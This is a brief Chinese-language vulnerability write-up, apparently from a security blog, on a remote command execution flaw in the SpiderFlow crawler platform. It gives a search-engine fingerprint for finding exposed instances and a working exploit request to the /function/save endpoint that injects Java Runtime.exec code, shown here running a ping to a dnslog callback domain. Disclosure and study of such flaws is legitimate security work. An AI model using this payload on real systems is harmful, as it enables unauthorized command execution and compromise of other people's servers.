SpiderFlow save 远程命令执行漏洞
# SpiderFlow save 远程命令执行漏洞
## 漏洞描述
SpiderFlow 平台以流程图的⽅式定义爬⾍,是⼀个⾼度灵活可配置的爬⾍平台
官⽹:https://www.spiderflow.org/
## 漏洞影响
Sp...
SpiderFlow save 远程命令执行漏洞
漏洞描述
SpiderFlow 平台以流程图的⽅式定义爬⾍,是⼀个⾼度灵活可配置的爬⾍平台
官⽹:https://www.spiderflow.org/
漏洞影响
SpiderFlow
网络测绘
title=="SpiderFlow"
漏洞复现
主页面
发送请求包执行命令
POST /function/save
id=&name=cmd¶meter=yw&script=}Java.type('java.lang.Runtime').getRuntime().exec('ping chwd71.dnslog.cn');{
- 发表于 2024-07-12 18:47:36
- 阅读 ( 2162 )
- 分类:Web应用
带头大哥
456 篇文章